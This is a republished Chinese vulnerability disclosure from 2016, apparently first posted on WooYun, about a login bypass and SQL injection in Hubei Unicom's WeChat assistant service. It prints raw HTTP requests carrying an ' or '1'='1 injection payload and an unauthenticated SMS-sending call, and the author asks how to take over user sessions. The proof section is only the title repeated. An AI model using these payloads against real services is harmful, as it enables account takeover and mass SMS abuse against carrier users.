神刀安全网

漏洞标题: 湖北联通官方微信沃助手任意登录与2处SQL注入

漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

RT

详细说明:

问题出在这个地址:**.**.**.**:9988/

第一处是登录接口:

code 区域
POST /userLogin.do?method=login HTTP/1.1
Host: **.**.**.**:9988
Proxy-Connection: keep-alive
Content-Length: 83
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: **.**.**.**:9988
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**:9988/login.html?msg=%25E7%2594%25A8%25E6%2588%25B7%25E5%2590%258D%25E6%2588%2596%25E5%25AF%2586%25E7%25A0%2581%25E9%2594%2599%25E8%25AF%25AF%25EF%25BC%2581
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=B3C2A0D5A059FE7F19BCE2C0FD8E4370; email=13888888888; password=13888888888; isstorePwd=yes

username=13888888888' or '1'='1&password=13888888888' or '1'='1

绕过验证

且存在sql注入问题。

第二处是:发送短信接口

code 区域
POST /sellMain.do?method=sendmsg HTTP/1.1
Host: **.**.**.**:9988
Proxy-Connection: keep-alive
Content-Length: 24
Accept: text/plain, */*; q=0.01
Origin: http://**.**.**.**:9988
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://**.**.**.**:9988/openOrder.html?id=8a5f82ca4f825e83014f82cd61440004&phone=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: email=13339718222; password=111111; isstorePwd=no; JSESSIONID=2948C8DADD9D0F7FFD4B4FFC307A1800

phone=13339718222

漏洞标题:  湖北联通官方微信沃助手任意登录与2处SQL注入

有没有大牛知道如何利用万能密码控制登录用户的。。我觉得应该可以做到。。求教!

漏洞证明:

漏洞标题:  湖北联通官方微信沃助手任意登录与2处SQL注入

漏洞标题:  湖北联通官方微信沃助手任意登录与2处SQL注入

漏洞标题:  湖北联通官方微信沃助手任意登录与2处SQL注入

漏洞标题:  湖北联通官方微信沃助手任意登录与2处SQL注入

然后可以利用短信接口给所有联通用户发流量包短信。。

修复方案:

过滤

版权声明:转载请注明来源 SoulHunter@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 湖北联通官方微信沃助手任意登录与2处SQL注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址